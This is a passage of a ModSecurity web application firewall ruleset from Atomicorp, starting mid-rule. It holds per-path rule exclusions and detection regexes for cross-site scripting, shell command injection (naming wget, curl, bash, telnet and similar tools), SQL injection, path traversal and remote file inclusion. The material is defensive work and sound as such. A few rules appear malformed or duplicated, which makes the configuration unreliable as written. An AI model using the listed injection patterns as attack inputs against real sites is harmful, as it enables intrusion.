ARGS:/thank/|!ARGS:/booking/|!ARGS:/msg/|!ARGS:/notice/|!ARGS:/email/|!ARGS:/caption/|!ARGS:ad_code|!ARGS:/pagecode/|!ARGS:/priceFormat/|!ARGS:/filter/|!ARGS:/^items/|!ARGS:/navigation/|!ARGS:/chronofield/|!ARGS:/script/|!ARGS:/specification/|!ARGS:/^code_/|!ARGS:/config/|!ARGS:/popup/|!ARGS:terms|!ARGS:parent_path|!ARGS:/^tips/|!ARGS:tag|!ARGS:/^form/|!ARGS:/^params/|!ARGS:/intro/|!ARGS:/info/|!ARGS:sidebar|!ARGS:code|!ARGS:/^option_value/|!ARGS:pay_inst_1|!ARGS:contact_info|!ARGS:thankyou|!ARGS:Right_photo_1|!ARGS:sml_prt_1|!ARGS:/layout/|!ARGS:thanksemail|!ARGS:/^jform/|!ARGS:/param/|!ARGS:/^xjxargs/|!ARGS:/^language_strings/|!ARGS:misc|!ARGS:layout|!ARGS:oid|!ARGS:prefix|!ARGS:/embedVideo/|!ARGS:value|!ARGS:default_value|!ARGS:/vendor_/|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/field_unit/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/duties/|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:/duties/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:parent_path|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:awards|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|\%env|< ?i?frame ?src ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|event|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=|shell\:|window\.location|asfunction:_root\.launch)"  "t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"

SecMarker END_RULES_91347

SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:91348,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=340193,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380011,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=380012,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340151,ctl:ruleRemovebyID=340007"
SecAction "phase:2,id:91349,t:none,pass,nolog,skipAfter:END_RULES_91349"

SecRule REQUEST_URI|ARGS|!ARGS:/onsubmitcode/|!ARGS:html|!ARGS:file|!ARGS:/^p_process_chat/|!ARGS:/template/|!ARGS:snippet|!ARGS:phpcode|!ARGS:intro|!ARGS:/title/|!ARGS:/^data_parent/|!ARGS:code|!ARGS:lajmi|!ARGS:newcontent|!ARGS:content|!ARGS:/desc/|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:/content/|!ARGS:/keyword/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/ "; ?(?:cat|ls|perl|uname|pwd|cp|kill|echo|tclsh8?|cpp|python|chown|rm|kill|ping|rsync|rdiff-backup|scp|(?:w|ftp)get|curl|links|g\+\+|ch(?:grp|own)|passwd|bash|telnet) " 	"phase:2,deny,log,auditlog,status:403,capture,id:343329,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhitespace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  command in REQUEST_URI or Argument',logdata:'%{TX.0}'"
# Rule 340147: Generic XSS filter
SecRule ARGS|ARGS_NAMES|!ARGS:/^cf/|!ARGS:/^OSDCS/|!ARGS:/^ARGS:booking_/|!ARGS:/^option_value/|!ARGS:/^one/|!ARGS:Right_photo_1|!ARGS:/term/|!ARGS:/^field/|!ARGS:/xargs/|!ARGS:/customcode/|!ARGS:/biography/|!ARGS:/review/|!ARGS:autogenerated|!ARGS:/^book/|!ARGS:/email/|!ARGS:/editor/|!ARGS:/listid/|!ARGS:/^_qf/|!ARGS:/select/|!ARGS:/filter/|!ARGS:/^tips/|!ARGS:/^items/|!ARGS:/navigation/|!ARGS:/chronofield/|!ARGS:/params/|!ARGS:tag|!ARGS:/^code_/|!ARGS:terms|!ARGS:/^form/|!ARGS:parent_path|!ARGS:/config/|!ARGS:/intro/|!ARGS:/info/|!ARGS:/^K2ExtraField/|!ARGS:/OSDCS/|!ARGS:info|!ARGS:server_validation|!ARGS:sidebar|!ARGS:pay_inst_1|!ARGS:/submitcode/|!ARGS:misc|!ARGS:/layout/|!ARGS:oid|!ARGS:layout|!ARGS:prefix|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "deny,log,auditlog,status:403,phase:2,t:none,t:removeNulls,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:310618,rev:92,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"

SecRule ARGS|!ARGS:task|!ARGS:q|!ARGS:submit2|!ARGS:/query/|!ARGS:/sql/ "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)" "deny,log,auditlog,status:403,phase:2,id:341544,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/administrator/index2.php)'"
SecRule ARGS|!ARGS:task|!ARGS:submit2|!ARGS:/query/|!ARGS:/sql/ "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)" "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,phase:2,id:341545,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/administrator/index2.php)'"
SecRule REQUEST_URI|ARGS|!ARGS:fcontent|!ARGS:videoplayer|!ARGS:/css/|!ARGS:/^wpm/|!ARGS:/message/|!ARGS:body|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:message "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"deny,log,auditlog,status:403,phase:2,t:none,t:lowercase,id:340789,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
SecRule ARGS|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:/query/|!ARGS:/sql/|!ARGS:prefix|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:content "(?:(\w+)and(\w+)char\([0-9]+\)|(?:execute|convert)\(|(?:\;delete.*;(?:insert|declare|varchar)|(?:and .* \(select |(?:drop|create)(\w+)table|declare .* varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |union all select |\b\W*?cast\b\W*?\(.* as |xecresultset|';declare\b\W*?|;set @)"                 "deny,log,auditlog,status:403,phase:2,multiMatch,id:341808,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)'"
SecRule REQUEST_URI "!(/products/index\.php\?gallery=)" 	"deny,log,auditlog,status:403,phase:2,chain,t:none,t:lowercase,id:340794,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"
SecRule REQUEST_URI|ARGS|!ARGS:/message/|!ARGS:body|!ARGS:/css/|!ARGS:/^wpm/|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:message|!ARGS:videoplayer "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"

SecRule REQUEST_URI|ARGS|!ARGS:fcontent|!ARGS:/message/|!ARGS:/css/|!ARGS:/^wpm/|!ARGS:body|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:message|!ARGS:videoplayer "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"deny,log,auditlog,status:403,phase:2,t:none,t:lowercase,id:340796,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"



SecMarker END_RULES_91349

SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:91350,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
SecAction "phase:2,id:91351,t:none,pass,nolog,skipAfter:END_RULES_91351"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340744,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340750,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91351

SecRule REQUEST_FILENAME "/cgi-bin/news/news\.cgi" "phase:2,id:91352,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
SecAction "phase:2,id:91353,t:none,pass,nolog,skipAfter:END_RULES_91353"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:341746,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340752,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91353

SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:91354,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91355,t:none,pass,nolog,skipAfter:END_RULES_91355"

#SecRule ARGS|!ARGS:tz_feedburner_email|!ARGS:tz_feedburner|!ARGS:tz_selectedtab|!ARGS:/icon/|!ARGS:/logo/|!ARGS:/linkedin/|!ARGS:/youtube/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/link/|!ARGS:/theme/|!ARGS:/logo/|!ARGS:flickr|!ARGS:/banner/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/banner/|!ARGS:/image/|!ARGS:revchurch_video|!ARGS:/^YBN_/|!ARGS:bfa_ata_logo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" #         "id:340753,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

#SecRule ARGS|!ARGS:tz_feedburner_email|!ARGS:tz_feedburner=|!ARGS:tz_selectedtab|!ARGS:/icon/|!ARGS:/logo/|!ARGS:/linkedin/|!ARGS:/youtube/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/link/|!ARGS:/theme/|!ARGS:/logo/|!ARGS:flickr|!ARGS:/banner/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/banner/|!ARGS:/image/|!ARGS:revchurch_video|!ARGS:/^YBN_/|!ARGS:bfa_ata_logo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" # "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340754,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91355

SecRule REQUEST_FILENAME "/edit-item\.php" "phase:2,id:91356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/removed\.php" "phase:2,id:91357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340084"

SecRule REQUEST_FILENAME "/ezgctrlpanel\.php" "phase:2,id:91358,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91359,t:none,pass,nolog,skipAfter:END_RULES_91359"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:defaultprodpg|!ARGS:/redirect/|!ARGS:/link/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/pthanks/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:350746,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:defaultprodpg|!ARGS:/redirect/|!ARGS:/link/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/pthanks/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:350756,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "deny,log,auditlog,status:403,phase:2,!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91359

SecRule REQUEST_FILENAME "/magazine/index\.php" "phase:2,id:91360,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91361,t:none,pass,nolog,skipAfter:END_RULES_91361"

SecRule ARGS|!ARGS:/path/|!ARGS:/site/|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:q|!ARGS:/referer/|!ARGS:/refer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:343745,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/path/|!ARGS:/site/|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:q|!ARGS:/referer/|!ARGS:/refer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340758,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91361

SecRule REQUEST_FILENAME "/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:91362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/track\.php" "phase:2,id:91363,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91364,t:none,pass,nolog,skipAfter:END_RULES_91364"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/ref/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/referrer/|!ARGS:/^S/|!ARGS:ref|!ARGS:/referer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340745,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/ref/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/referrer/|!ARGS:/^S/|!ARGS:ref|!ARGS:/referer/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340760,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91364

SecRule REQUEST_FILENAME "/flashgallery\.php" "phase:2,id:91365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:91366,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91367,t:none,pass,nolog,skipAfter:END_RULES_91367"

